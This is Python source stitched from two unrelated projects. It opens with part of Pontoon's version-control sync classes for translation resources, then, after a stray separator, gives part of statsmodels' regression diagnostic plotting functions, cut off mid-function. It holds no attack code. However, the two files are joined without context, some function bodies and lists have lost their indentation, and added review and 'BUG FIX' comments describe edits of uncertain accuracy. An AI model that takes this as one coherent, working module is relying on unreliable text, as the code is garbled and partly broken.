            raise MissingSourceDirectoryError(
                'No source directory found for project {0}'.format(self.db_project.slug)
            )

    def relative_resource_paths(self):
        """
        List of paths relative to the locale directories returned by
        self.source_directory_path for each resource in this project.
        """
        path = self.source_directory_path
        for absolute_path in self.resources_for_path(path):
            # .pot files in the source dir map to .po paths in locale dirs.
            absolute_path = source_to_locale_path(absolute_path)
            yield os.path.relpath(absolute_path, path)

    def resources_for_path(self, path):
        """
        List of paths for all supported resources found within the given
        path.
        """
        for root, dirnames, filenames in scandir.walk(path):
            if is_hidden(root):
                continue

            # Ignore certain files in Mozilla repositories.
            if self.db_project.repository_url in MOZILLA_REPOS:
                filenames = [f for f in filenames if not f.endswith('region.properties')]

            for filename in filenames:
                if is_resource(filename):
                    yield os.path.join(root, filename)
class VCSResource(object):
    """Represents a single resource across multiple locales."""

    def __init__(self, vcs_project, path, locales=None):
        """
        Load the resource file for each enabled locale and store its
        translations in VCSEntity instances.

        :param VCSProject vcs_project: owning project container.
        :param str path: resource path relative to a locale directory.
        :param locales: Locale instances to load translations for.
        """
        from pontoon.base.models import Locale
        from pontoon.sync import formats  # Avoid circular import.

        self.vcs_project = vcs_project
        self.path = path
        self.locales = locales or []
        # locale -> parsed resource file object.
        self.files = {}
        # entity key -> VCSEntity.
        self.entities = {}

        # Create entities using resources from the source directory,
        source_resource_path = os.path.join(vcs_project.source_directory_path, self.path)
        source_resource_path = locale_to_source_path(source_resource_path)
        source_resource_file = formats.parse(
            source_resource_path,
            locale=Locale.objects.get(code='en-US')
        )
        for index, translation in enumerate(source_resource_file.translations):
            vcs_entity = VCSEntity(
                resource=self,
                key=translation.key,
                string=translation.source_string,
                string_plural=translation.source_string_plural,
                comments=translation.comments,
                source=translation.source,
                # Preserve explicit ordering; fall back to file position.
                order=translation.order or index
            )
            self.entities[vcs_entity.key] = vcs_entity

        # Fill in translations from the locale resources.
        # NOTE(review): iterates the `locales` argument, not `self.locales`;
        # passing locales=None would raise TypeError here — presumably callers
        # always pass a list. TODO confirm.
        for locale in locales:
            locale_directory = self.vcs_project.locale_directory_paths[locale.code]
            resource_path = os.path.join(locale_directory, self.path)
            log.debug('Parsing resource file: %s', resource_path)

            try:
                resource_file = formats.parse(resource_path, source_resource_path, locale)
            except (IOError, ParseError):
                continue  # File doesn't exist or is invalid, let's move on

            self.files[locale] = resource_file

            log.debug('Discovered %s translations.', len(resource_file.translations))

            for translation in resource_file.translations:
                try:
                    self.entities[translation.key].translations[locale.code] = translation
                except KeyError:
                    # If the source is missing an entity, we consider it
                    # deleted and don't add it.
                    pass

    def save(self, locale=None):
        """
        Save changes made to any of the translations in this resource
        back to the filesystem for all locales.

        :param locale: if given, save only that locale's file.
        """
        if locale:
            self.files[locale].save(locale)
        else:
            for locale, resource_file in self.files.items():
                resource_file.save(locale)
class VCSEntity(object):
    """A single translatable string together with its per-locale
    translations."""

    def __init__(self, resource, key, string, comments, source, string_plural='',
                 order=0):
        # Identity and content of the source string.
        self.resource = resource
        self.key = key
        self.string = string
        self.string_plural = string_plural
        self.comments = comments
        self.source = source
        self.order = order
        # Maps locale code -> translation; filled in by VCSResource.
        self.translations = {}

    def has_translation_for(self, locale_code):
        """Return True if a translation exists for the given locale."""
        found = locale_code in self.translations
        return found
class VCSTranslation(object):
    """
    A single translation of a source string into another language.

    Since a string can have different translations based on plural
    forms, all of the different forms are stored under self.strings, a
    dict where the keys equal possible values for
    pontoon.base.models.Translation.plural_form and the values equal the
    translation for that plural form.
    """
    def __init__(
        self, key, strings, comments, fuzzy,
        source_string='',
        source_string_plural='',
        order=0,
        source=None,
        last_translator=None,
        last_updated=None
    ):
        # Source-side data.
        self.key = key
        self.source_string = source_string
        self.source_string_plural = source_string_plural
        self.order = order
        self.source = source or []
        # Translation-side data.
        self.strings = strings
        self.comments = comments
        self.fuzzy = fuzzy
        self.last_translator = last_translator
        self.last_updated = last_updated

    @property
    def extra(self):
        """
        Return a dict of custom properties to store in the database.
        Useful for subclasses from specific formats that have extra data
        that needs to be preserved.
        """
        return {}

    def update_from_db(self, db_translations):
        """
        Update translation with current DB state.
        """
        # Fuzzy iff at least one DB translation is flagged fuzzy.
        self.fuzzy = any(t for t in db_translations if t.fuzzy)

        if db_translations:
            # Translations without a date sort as the earliest possible
            # aware datetime.
            def newest_key(t):
                return t.date or timezone.make_aware(datetime.min)

            newest = max(db_translations, key=newest_key)
            self.last_updated = newest.date
            self.last_translator = newest.user

        # Replace existing translations with ones from the database.
        self.strings = {
            db.plural_form: db.string for db in db_translations
        }
| |
'''Partial Regression plot and residual plots to find misspecification
Author: Josef Perktold
License: BSD-3
Created: 2011-01-23
update
2011-06-05 : start to convert example to usable functions
2011-10-27 : docstrings
'''
from statsmodels.compat.python import lrange, string_types, lzip, range
import numpy as np
import pandas as pd
from patsy import dmatrix
from statsmodels.regression.linear_model import OLS, GLS, WLS
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod.generalized_estimating_equations import GEE
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from statsmodels.graphics import utils
from statsmodels.nonparametric.smoothers_lowess import lowess
from statsmodels.tools.tools import maybe_unwrap_results
from statsmodels.base import model
from ._regressionplots_doc import (
_plot_added_variable_doc,
_plot_partial_residuals_doc,
_plot_ceres_residuals_doc)
__all__ = ['plot_fit', 'plot_regress_exog', 'plot_partregress', 'plot_ccpr',
'plot_regress_exog', 'plot_partregress_grid', 'plot_ccpr_grid',
'add_lowess', 'abline_plot', 'influence_plot',
'plot_leverage_resid2', 'added_variable_resids',
'partial_resids', 'ceres_resids', 'plot_added_variable',
'plot_partial_residuals', 'plot_ceres_residuals']
#TODO: consider moving to influence module
def _high_leverage(results):
#TODO: replace 1 with k_constant
return 2. * (results.df_model + 1)/results.nobs
def add_lowess(ax, lines_idx=0, frac=.2, **lowess_kwargs):
    """
    Add Lowess line to a plot.

    Parameters
    ----------
    ax : matplotlib Axes instance
        The Axes to which to add the plot
    lines_idx : int
        This is the line on the existing plot to which you want to add
        a smoothed lowess line.
    frac : float
        The fraction of the points to use when doing the lowess fit.
    lowess_kwargs
        Additional keyword arguments are passed to lowess.

    Returns
    -------
    fig : matplotlib Figure instance
        The figure that holds the instance.
    """
    # Pull the raw data back out of the selected existing line.
    line = ax.get_lines()[lines_idx]
    smoothed = lowess(line._y, line._x, frac=frac, **lowess_kwargs)
    ax.plot(smoothed[:, 0], smoothed[:, 1], 'r', lw=1.5)
    return ax.figure
def plot_fit(results, exog_idx, y_true=None, ax=None, **kwargs):
    """Plot fit against one regressor.

    This creates one graph with the scatterplot of observed values compared to
    fitted values.

    Parameters
    ----------
    results : result instance
        result instance with resid, model.endog and model.exog as attributes
    exog_idx : int or str
        Name or index of regressor in exog matrix.
    y_true : array_like
        (optional) If this is not None, then the array is added to the plot
    ax : Matplotlib AxesSubplot instance, optional
        If given, this subplot is used to plot in instead of a new figure being
        created.
    kwargs
        The keyword arguments are passed to the plot command for the fitted
        values points.

    Returns
    -------
    fig : Matplotlib figure instance
        If `ax` is None, the created figure. Otherwise the figure to which
        `ax` is connected.

    Examples
    --------
    Load the Statewide Crime data set and perform linear regression with
    `poverty` and `hs_grad` as variables and `murder` as the response

    >>> import statsmodels.api as sm
    >>> import matplotlib.pyplot as plt

    >>> data = sm.datasets.statecrime.load_pandas().data
    >>> murder = data['murder']
    >>> X = data[['poverty', 'hs_grad']]

    >>> X["constant"] = 1
    >>> y = murder
    >>> model = sm.OLS(y, X)
    >>> results = model.fit()

    Create a plot just for the variable 'Poverty':

    >>> fig, ax = plt.subplots()
    >>> fig = sm.graphics.plot_fit(results, 0, ax=ax)
    >>> ax.set_ylabel("Murder Rate")
    >>> ax.set_xlabel("Poverty Level")
    >>> ax.set_title("Linear Regression")

    >>> plt.show()

    .. plot:: plots/graphics_plot_fit_ex.py
    """
    fig, ax = utils.create_mpl_ax(ax)

    exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
    results = maybe_unwrap_results(results)

    #maybe add option for wendog, wexog
    y = results.model.endog
    x1 = results.model.exog[:, exog_idx]
    # Sort by the regressor so the fitted markers and error bars appear in
    # left-to-right order.
    x1_argsort = np.argsort(x1)
    y = y[x1_argsort]
    x1 = x1[x1_argsort]

    ax.plot(x1, y, 'bo', label=results.model.endog_names)
    # Fixed: was `if not y_true is None` (PEP 8 E714).
    if y_true is not None:
        ax.plot(x1, y_true[x1_argsort], 'b-', label='True values')
    title = 'Fitted values versus %s' % exog_name

    prstd, iv_l, iv_u = wls_prediction_std(results)
    ax.plot(x1, results.fittedvalues[x1_argsort], 'D', color='r',
            label='fitted', **kwargs)
    # Prediction interval around each fitted value.
    ax.vlines(x1, iv_l[x1_argsort], iv_u[x1_argsort], linewidth=1, color='k',
              alpha=.7)
    #ax.fill_between(x1, iv_l[x1_argsort], iv_u[x1_argsort], alpha=0.1,
    #                color='k')
    ax.set_title(title)
    ax.set_xlabel(exog_name)
    ax.set_ylabel(results.model.endog_names)
    ax.legend(loc='best', numpoints=1)

    return fig
def plot_regress_exog(results, exog_idx, fig=None):
    """Plot regression results against one regressor.

    This plots four graphs in a 2 by 2 figure: 'endog versus exog',
    'residuals versus exog', 'fitted versus exog' and
    'fitted plus residual versus exog'

    Parameters
    ----------
    results : result instance
        result instance with resid, model.endog and model.exog as attributes
    exog_idx : int
        index of regressor in exog matrix
    fig : Matplotlib figure instance, optional
        If given, this figure is simply returned. Otherwise a new figure is
        created.

    Returns
    -------
    fig : matplotlib figure instance
    """
    fig = utils.create_mpl_fig(fig)

    exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
    results = maybe_unwrap_results(results)

    #maybe add option for wendog, wexog
    y_name = results.model.endog_names
    x1 = results.model.exog[:, exog_idx]
    prstd, iv_l, iv_u = wls_prediction_std(results)

    # Subplot 1: observed and fitted values with prediction intervals.
    ax = fig.add_subplot(2, 2, 1)
    ax.plot(x1, results.model.endog, 'o', color='b', alpha=0.9, label=y_name)
    ax.plot(x1, results.fittedvalues, 'D', color='r', label='fitted',
            alpha=.5)
    ax.vlines(x1, iv_l, iv_u, linewidth=1, color='k', alpha=.7)
    ax.set_title('Y and Fitted vs. X', fontsize='large')
    ax.set_xlabel(exog_name)
    ax.set_ylabel(y_name)
    ax.legend(loc='best')

    # Subplot 2: residuals against the regressor.
    ax = fig.add_subplot(2, 2, 2)
    ax.plot(x1, results.resid, 'o')
    ax.axhline(y=0, color='black')
    ax.set_title('Residuals versus %s' % exog_name, fontsize='large')
    ax.set_xlabel(exog_name)
    ax.set_ylabel("resid")

    # Subplot 3: partial regression plot, conditioning on all other exog
    # columns (boolean mask removes the selected column).
    ax = fig.add_subplot(2, 2, 3)
    exog_noti = np.ones(results.model.exog.shape[1], bool)
    exog_noti[exog_idx] = False
    exog_others = results.model.exog[:, exog_noti]
    from pandas import Series
    fig = plot_partregress(results.model.data.orig_endog,
                           Series(x1, name=exog_name,
                                  index=results.model.data.row_labels),
                           exog_others, obs_labels=False, ax=ax)
    ax.set_title('Partial regression plot', fontsize='large')
    #ax.set_ylabel("Fitted values")
    #ax.set_xlabel(exog_name)

    # Subplot 4: component-plus-residual (CCPR) plot.
    ax = fig.add_subplot(2, 2, 4)
    fig = plot_ccpr(results, exog_idx, ax=ax)
    ax.set_title('CCPR Plot', fontsize='large')
    #ax.set_xlabel(exog_name)
    #ax.set_ylabel("Fitted values + resids")

    fig.suptitle('Regression Plots for %s' % exog_name, fontsize="large")

    fig.tight_layout()

    # Leave room for the suptitle above the grid.
    fig.subplots_adjust(top=.90)
    return fig
def _partial_regression(endog, exog_i, exog_others):
    """Partial regression.

    regress endog on exog_i conditional on exog_others

    uses OLS

    Parameters
    ----------
    endog : array_like
    exog_i : array_like
    exog_others : array_like

    Returns
    -------
    res1c : OLS results instance
    (res1a, res1b) : tuple of OLS results instances
        results from regression of endog on exog_others and of exog_i on
        exog_others
    """
    #FIXME: This function doesn't appear to be used.
    # Partial out exog_others from both endog and exog_i, then regress the
    # residuals on each other.
    res_endog = OLS(endog, exog_others).fit()
    res_exog_i = OLS(exog_i, exog_others).fit()
    res_partial = OLS(res_endog.resid, res_exog_i.resid).fit()

    return res_partial, (res_endog, res_exog_i)
def plot_partregress(endog, exog_i, exog_others, data=None,
                     title_kwargs={}, obs_labels=True, label_kwargs={},
                     ax=None, ret_coords=False, **kwargs):
    """Plot partial regression for a single regressor.

    Parameters
    ----------
    endog : ndarray or string
       endogenous or response variable. If string is given, you can use a
       arbitrary translations as with a formula.
    exog_i : ndarray or string
        exogenous, explanatory variable. If string is given, you can use a
        arbitrary translations as with a formula.
    exog_others : ndarray or list of strings
        other exogenous, explanatory variables. If a list of strings is given,
        each item is a term in formula. You can use a arbitrary translations
        as with a formula. The effect of these variables will be removed by
        OLS regression.
    data : DataFrame, dict, or recarray
        Some kind of data structure with names if the other variables are
        given as strings.
    title_kwargs : dict
        Keyword arguments to pass on for the title. The key to control the
        fonts is fontdict.
    obs_labels : bool or array-like
        Whether or not to annotate the plot points with their observation
        labels. If obs_labels is a boolean, the point labels will try to do
        the right thing. First it will try to use the index of data, then
        fall back to the index of exog_i. Alternatively, you may give an
        array-like object corresponding to the observation numbers.
    label_kwargs : dict
        Keyword arguments that control annotate for the observation labels.
    ax : Matplotlib AxesSubplot instance, optional
        If given, this subplot is used to plot in instead of a new figure being
        created.
    ret_coords : bool
        If True will return the coordinates of the points in the plot. You
        can use this to add your own annotations.
    kwargs
        The keyword arguments passed to plot for the points.

    Returns
    -------
    fig : Matplotlib figure instance
        If `ax` is None, the created figure. Otherwise the figure to which
        `ax` is connected.
    coords : list, optional
        If ret_coords is True, return a tuple of arrays (x_coords, y_coords).

    Notes
    -----
    The slope of the fitted line is the that of `exog_i` in the full
    multiple regression. The individual points can be used to assess the
    influence of points on the estimated coefficient.

    See Also
    --------
    plot_partregress_grid : Plot partial regression for a set of regressors.
    """
    #NOTE: there is no interaction between possible missing data and
    #obs_labels yet, so this will need to be tweaked a bit for this case
    fig, ax = utils.create_mpl_ax(ax)

    # strings, use patsy to transform to data
    if isinstance(endog, string_types):
        endog = dmatrix(endog + "-1", data)

    if isinstance(exog_others, string_types):
        RHS = dmatrix(exog_others, data)
    elif isinstance(exog_others, list):
        RHS = "+".join(exog_others)
        RHS = dmatrix(RHS, data)
    else:
        RHS = exog_others
    # Detect an empty conditioning set (nothing to partial out).
    RHS_isemtpy = False
    if isinstance(RHS, np.ndarray) and RHS.size==0:
        RHS_isemtpy = True
    elif isinstance(RHS, pd.DataFrame) and RHS.empty:
        RHS_isemtpy = True
    if isinstance(exog_i, string_types):
        exog_i = dmatrix(exog_i + "-1", data)

    # all arrays or pandas-like
    if RHS_isemtpy:
        # No other regressors: plot endog against exog_i directly.
        # NOTE(review): res_xaxis / res_yaxis are never assigned on this
        # branch, but the obs_labels fallback and ret_coords paths below
        # reference them — those combinations would raise NameError. Confirm.
        ax.plot(endog, exog_i, 'o', **kwargs)
        fitted_line = OLS(endog, exog_i).fit()
        x_axis_endog_name = 'x' if isinstance(exog_i, np.ndarray) else exog_i.name
        y_axis_endog_name = 'y' if isinstance(endog, np.ndarray) else endog.design_info.column_names[0]
    else:
        # Partial out RHS from both variables and plot the residuals.
        res_yaxis = OLS(endog, RHS).fit()
        res_xaxis = OLS(exog_i, RHS).fit()
        xaxis_resid = res_xaxis.resid
        yaxis_resid = res_yaxis.resid
        x_axis_endog_name = res_xaxis.model.endog_names
        y_axis_endog_name = res_yaxis.model.endog_names
        ax.plot(xaxis_resid, yaxis_resid, 'o', **kwargs)
        fitted_line = OLS(yaxis_resid, xaxis_resid).fit()

    fig = abline_plot(0, fitted_line.params[0], color='k', ax=ax)

    if x_axis_endog_name == 'y':  # for no names regression will just get a y
        x_axis_endog_name = 'x'  # this is misleading, so use x
    ax.set_xlabel("e(%s | X)" % x_axis_endog_name)
    ax.set_ylabel("e(%s | X)" % y_axis_endog_name)
    ax.set_title('Partial Regression Plot', **title_kwargs)

    #NOTE: if we want to get super fancy, we could annotate if a point is
    #clicked using this widget
    #http://stackoverflow.com/questions/4652439/
    #is-there-a-matplotlib-equivalent-of-matlabs-datacursormode/
    #4674445#4674445
    if obs_labels is True:
        if data is not None:
            obs_labels = data.index
        elif hasattr(exog_i, "index"):
            obs_labels = exog_i.index
        else:
            obs_labels = res_xaxis.model.data.row_labels
        #NOTE: row_labels can be None.
        #Maybe we should fix this to never be the case.
        if obs_labels is None:
            obs_labels = lrange(len(exog_i))

    if obs_labels is not False:  # could be array-like
        if len(obs_labels) != len(exog_i):
            raise ValueError("obs_labels does not match length of exog_i")
        label_kwargs.update(dict(ha="center", va="bottom"))
        ax = utils.annotate_axes(lrange(len(obs_labels)), obs_labels,
                                 lzip(res_xaxis.resid, res_yaxis.resid),
                                 [(0, 5)] * len(obs_labels), "x-large", ax=ax,
                                 **label_kwargs)

    if ret_coords:
        return fig, (res_xaxis.resid, res_yaxis.resid)
    else:
        return fig
def plot_partregress_grid(results, exog_idx=None, grid=None, fig=None):
    """Plot partial regression for a set of regressors.

    Parameters
    ----------
    results : results instance
        A regression model results instance
    exog_idx : None, list of ints, list of strings
        (column) indices of the exog used in the plot, default is all.
    grid : None or tuple of int (nrows, ncols)
        If grid is given, then it is used for the arrangement of the subplots.
        If grid is None, then ncol is one, if there are only 2 subplots, and
        the number of columns is two otherwise.
    fig : Matplotlib figure instance, optional
        If given, this figure is simply returned. Otherwise a new figure is
        created.

    Returns
    -------
    fig : Matplotlib figure instance
        If `fig` is None, the created figure. Otherwise `fig` itself.

    Notes
    -----
    A subplot is created for each explanatory variable given by exog_idx.
    The partial regression plot shows the relationship between the response
    and the given explanatory variable after removing the effect of all other
    explanatory variables in exog.

    See Also
    --------
    plot_partregress : Plot partial regression for a single regressor.
    plot_ccpr

    References
    ----------
    See http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/partregr.htm
    """
    import pandas
    fig = utils.create_mpl_fig(fig)

    exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)

    #maybe add option for using wendog, wexog instead
    y = pandas.Series(results.model.endog, name=results.model.endog_names)
    exog = results.model.exog

    k_vars = exog.shape[1]
    #this function doesn't make sense if k_vars=1

    # Fixed: was `if not grid is None` (PEP 8 E714).
    if grid is not None:
        nrows, ncols = grid
    else:
        # Default layout: two columns once there are more than two plots.
        if len(exog_idx) > 2:
            nrows = int(np.ceil(len(exog_idx)/2.))
            ncols = 2
            title_kwargs = {"fontdict" : {"fontsize" : 'small'}}
        else:
            nrows = len(exog_idx)
            ncols = 1
            title_kwargs = {}

    # for indexing purposes
    other_names = np.array(results.model.exog_names)
    for i, idx in enumerate(exog_idx):
        # Condition on every exog column except the one being plotted.
        others = lrange(k_vars)
        others.pop(idx)
        exog_others = pandas.DataFrame(exog[:, others],
                                       columns=other_names[others])
        ax = fig.add_subplot(nrows, ncols, i+1)
        plot_partregress(y, pandas.Series(exog[:, idx],
                                          name=other_names[idx]),
                         exog_others, ax=ax, title_kwargs=title_kwargs,
                         obs_labels=False)
        ax.set_title("")

    fig.suptitle("Partial Regression Plot", fontsize="large")
    fig.tight_layout()
    fig.subplots_adjust(top=.95)

    return fig
def plot_ccpr(results, exog_idx, ax=None):
    """Plot CCPR against one regressor.

    Generates a CCPR (component and component-plus-residual) plot.

    Parameters
    ----------
    results : result instance
        A regression results instance.
    exog_idx : int or string
        Exogenous, explanatory variable. If string is given, it should
        be the variable name that you want to use, and you can use arbitrary
        translations as with a formula.
    ax : Matplotlib AxesSubplot instance, optional
        If given, it is used to plot in instead of a new figure being
        created.

    Returns
    -------
    fig : Matplotlib figure instance
        If `ax` is None, the created figure. Otherwise the figure to which
        `ax` is connected.

    See Also
    --------
    plot_ccpr_grid : Creates CCPR plot for multiple regressors in a plot grid.

    Notes
    -----
    The CCPR plot provides a way to judge the effect of one regressor on the
    response variable by taking into account the effects of the other
    independent variables. The partial residuals plot is defined as
    Residuals + B_i*X_i versus X_i. The component adds the B_i*X_i versus
    X_i to show where the fitted line would lie. Care should be taken if X_i
    is highly correlated with any of the other independent variables. If this
    is the case, the variance evident in the plot will be an underestimate of
    the true variance.

    References
    ----------
    http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/ccpr.htm
    """
    fig, ax = utils.create_mpl_ax(ax)

    exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
    results = maybe_unwrap_results(results)

    x1 = results.model.exog[:, exog_idx]
    #namestr = ' for %s' % self.name if self.name else ''
    # Component (B_i * X_i) plus residual, plotted against X_i.
    x1beta = x1*results.params[exog_idx]
    ax.plot(x1, x1beta + results.resid, 'o')
    from statsmodels.tools.tools import add_constant
    # Fit the component on X_i to draw the reference line.
    mod = OLS(x1beta, add_constant(x1)).fit()
    params = mod.params
    # Fixed: was `abline_plot(*params, **dict(ax=ax))` — pass ax directly.
    fig = abline_plot(*params, ax=ax)
    #ax.plot(x1, x1beta, '-')
    ax.set_title('Component and component plus residual plot')
    ax.set_ylabel("Residual + %s*beta_%d" % (exog_name, exog_idx))
    ax.set_xlabel("%s" % exog_name)

    return fig
def plot_ccpr_grid(results, exog_idx=None, grid=None, fig=None):
    """Generate CCPR plots against a set of regressors, plot in a grid.

    Generates a grid of CCPR (component and component-plus-residual) plots.

    Parameters
    ----------
    results : result instance
        uses exog and params of the result instance
    exog_idx : None or list of int
        (column) indices of the exog used in the plot
    grid : None or tuple of int (nrows, ncols)
        If grid is given, then it is used for the arrangement of the
        subplots. If grid is None, then ncol is one if there are only 2
        subplots, and the number of columns is two otherwise.
    fig : Matplotlib figure instance, optional
        If given, this figure is simply returned. Otherwise a new figure is
        created.

    Returns
    -------
    fig : Matplotlib figure instance
        If `fig` is None, the created figure. Otherwise `fig` itself.

    Notes
    -----
    Partial residual plots are formed as ``Res + Betahat(i)*Xi versus Xi``
    and CCPR adds ``Betahat(i)*Xi versus Xi``.

    See Also
    --------
    plot_ccpr : Creates CCPR plot for a single regressor.

    References
    ----------
    See http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/ccpr.htm
    """
    fig = utils.create_mpl_fig(fig)

    exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)

    # Grid layout: caller-specified, otherwise one column for up to two
    # plots and two columns beyond that.
    if grid is not None:
        nrows, ncols = grid
    elif len(exog_idx) > 2:
        nrows = int(np.ceil(len(exog_idx) / 2.))
        ncols = 2
    else:
        nrows = len(exog_idx)
        ncols = 1

    const_offset = 0
    for plot_num, idx in enumerate(exog_idx):
        # Skip a constant (zero-variance) column and shift later plots
        # up by one slot so no subplot position is left empty.
        if results.model.exog[:, idx].var() == 0:
            const_offset = 1
            continue
        ax = fig.add_subplot(nrows, ncols, plot_num + 1 - const_offset)
        fig = plot_ccpr(results, exog_idx=idx, ax=ax)
        ax.set_title("")

    fig.suptitle("Component-Component Plus Residual Plot", fontsize="large")
    fig.tight_layout()
    fig.subplots_adjust(top=.95)
    return fig
def abline_plot(intercept=None, slope=None, horiz=None, vert=None,
                model_results=None, ax=None, **kwargs):
    """
    Plots a line given an intercept and slope.

    Parameters
    ----------
    intercept : float
        The intercept of the line.
    slope : float
        The slope of the line.
    horiz : float or array-like
        Data for horizontal lines on the y-axis.
    vert : float or array-like
        Data for vertical lines on the x-axis.
    model_results : statsmodels results instance
        Any object that has a two-value `params` attribute. Assumed that it
        is (intercept, slope).
    ax : axes, optional
        Matplotlib axes instance.
    kwargs
        Options passed to matplotlib.pyplot.plt

    Returns
    -------
    fig : Figure
        The figure given by `ax.figure` or a new instance.

    Raises
    ------
    ValueError
        If neither `model_results` nor both `intercept` and `slope` are
        given.

    Examples
    --------
    >>> import numpy as np
    >>> import statsmodels.api as sm
    >>> np.random.seed(12345)
    >>> X = sm.add_constant(np.random.normal(0, 20, size=30))
    >>> y = np.dot(X, [25, 3.5]) + np.random.normal(0, 30, size=30)
    >>> mod = sm.OLS(y,X).fit()
    >>> fig = sm.graphics.abline_plot(model_results=mod)
    >>> ax = fig.axes[0]
    >>> ax.scatter(X[:,1], y)
    >>> ax.margins(.1)
    >>> import matplotlib.pyplot as plt
    >>> plt.show()
    """
    if ax is not None:  # get axis limits first thing, don't change these
        x = ax.get_xlim()
    else:
        x = None
    fig, ax = utils.create_mpl_ax(ax)

    if model_results:
        intercept, slope = model_results.params
        if x is None:
            x = [model_results.model.exog[:, 1].min(),
                 model_results.model.exog[:, 1].max()]
    else:
        if not (intercept is not None and slope is not None):
            # BUG FIX: corrected typo "intercepty" in the error message.
            raise ValueError("specify slope and intercept or model_results")
        if x is None:
            x = ax.get_xlim()

    data_y = [x[0]*slope + intercept, x[1]*slope + intercept]
    ax.set_xlim(x)
    #ax.set_ylim(y)

    from matplotlib.lines import Line2D

    class ABLine2D(Line2D):
        # Redraws the line across the current x-limits whenever the axes
        # limits change (connected via the lim_changed callbacks below).
        def update_datalim(self, ax):
            ax.set_autoscale_on(False)
            children = ax.get_children()
            abline = [children[i] for i in range(len(children))
                      if isinstance(children[i], ABLine2D)][0]
            x = ax.get_xlim()
            y = [x[0]*slope + intercept, x[1]*slope + intercept]
            abline.set_data(x, y)
            ax.figure.canvas.draw()

    #TODO: how to intercept something like a margins call and adjust?
    line = ABLine2D(x, data_y, **kwargs)
    ax.add_line(line)
    ax.callbacks.connect('xlim_changed', line.update_datalim)
    ax.callbacks.connect('ylim_changed', line.update_datalim)

    # BUG FIX: matplotlib Axes has no `hline`/`vline` methods; use
    # axhline/axvline. Also compare against None (rather than truthiness)
    # so that 0 and array-like inputs, as documented, work.
    if horiz is not None:
        for y_val in np.atleast_1d(horiz):
            ax.axhline(y_val)
    if vert is not None:
        for x_val in np.atleast_1d(vert):
            ax.axvline(x_val)
    return fig
def influence_plot(results, external=True, alpha=.05, criterion="cooks",
                   size=48, plot_alpha=.75, ax=None, **kwargs):
    """
    Plot of influence in regression. Plots studentized resids vs. leverage.

    Parameters
    ----------
    results : results instance
        A fitted model.
    external : bool
        Whether to use externally or internally studentized residuals. It is
        recommended to leave external as True.
    alpha : float
        The alpha value to identify large studentized residuals. Large means
        abs(resid_studentized) > t.ppf(1-alpha/2, dof=results.df_resid)
    criterion : str {'DFFITS', 'Cooks'}
        Which criterion to base the size of the points on. Options are
        DFFITS or Cook's D.
    size : float
        The range of `criterion` is mapped to 10**2 - size**2 in points.
    plot_alpha : float
        The `alpha` of the plotted points.
    ax : matplotlib Axes instance
        An instance of a matplotlib Axes.

    Returns
    -------
    fig : matplotlib figure
        The matplotlib figure that contains the Axes.

    Notes
    -----
    Row labels for the observations in which the leverage, measured by the
    diagonal of the hat matrix, is high or the residuals are large, as the
    combination of large residuals and a high influence value indicates an
    influence point. The value of large residuals can be controlled using
    the `alpha` parameter. Large leverage points are identified as
    hat_i > 2 * (df_model + 1)/nobs.
    """
    fig, ax = utils.create_mpl_ax(ax)

    infl = results.get_influence()

    # BUG FIX: the criterion branches were swapped -- requesting "cooks"
    # plotted |DFFITS| sizes and requesting "dffits" plotted Cook's D.
    if criterion.lower().startswith('coo'):
        psize = infl.cooks_distance[0]
    elif criterion.lower().startswith('dff'):
        psize = np.abs(infl.dffits[0])
    else:
        raise ValueError("Criterion %s not understood" % criterion)

    # scale the variables
    #TODO: what is the correct scaling and the assumption here?
    #we want plots to be comparable across different plots
    #so we would need to use the expected distribution of criterion probably
    old_range = np.ptp(psize)
    new_range = size**2 - 8**2
    psize = (psize - psize.min()) * new_range/old_range + 8**2

    leverage = infl.hat_matrix_diag
    if external:
        resids = infl.resid_studentized_external
    else:
        resids = infl.resid_studentized_internal

    from scipy import stats

    cutoff = stats.t.ppf(1. - alpha/2, results.df_resid)
    large_resid = np.abs(resids) > cutoff
    large_leverage = leverage > _high_leverage(results)
    large_points = np.logical_or(large_resid, large_leverage)

    ax.scatter(leverage, resids, s=psize, alpha=plot_alpha)

    # add point labels
    labels = results.model.data.row_labels
    if labels is None:
        labels = lrange(len(resids))
    ax = utils.annotate_axes(np.where(large_points)[0], labels,
                             lzip(leverage, resids),
                             lzip(-(psize/2)**.5, (psize/2)**.5), "x-large",
                             ax)

    #TODO: make configurable or let people do it ex-post?
    font = {"fontsize" : 16, "color" : "black"}
    ax.set_ylabel("Studentized Residuals", **font)
    ax.set_xlabel("H Leverage", **font)
    ax.set_title("Influence Plot", **font)
    return fig
def plot_leverage_resid2(results, alpha=.05, label_kwargs=None, ax=None,
                         **kwargs):
    """
    Plots leverage statistics vs. normalized residuals squared

    Parameters
    ----------
    results : results instance
        A regression results instance
    alpha : float
        Specifies the cut-off for large-standardized residuals. Residuals
        are assumed to be distributed N(0, 1) with alpha=alpha.
    label_kwargs : dict, optional
        The keywords to pass to annotate for the labels. Defaults to an
        empty dict.
    ax : Axes instance
        Matplotlib Axes instance

    Returns
    -------
    fig : matplotlib Figure
        A matplotlib figure instance.
    """
    from scipy.stats import zscore, norm

    # BUG FIX: the default was a mutable ``{}`` argument, which is shared
    # across calls in Python; use None as the default instead.
    if label_kwargs is None:
        label_kwargs = {}

    fig, ax = utils.create_mpl_ax(ax)

    infl = results.get_influence()
    leverage = infl.hat_matrix_diag
    resid = zscore(results.resid)
    ax.plot(resid**2, leverage, 'o', **kwargs)
    ax.set_xlabel("Normalized residuals**2")
    ax.set_ylabel("Leverage")
    ax.set_title("Leverage vs. Normalized residuals squared")

    large_leverage = leverage > _high_leverage(results)
    #norm or t here if standardized?
    cutoff = norm.ppf(1. - alpha/2)
    large_resid = np.abs(resid) > cutoff
    labels = results.model.data.row_labels
    if labels is None:
        # BUG FIX: nobs may be a float; range/lrange requires an int
        # (consistent with the int(results.nobs) use below).
        labels = lrange(int(results.nobs))
    index = np.where(np.logical_or(large_leverage, large_resid))[0]
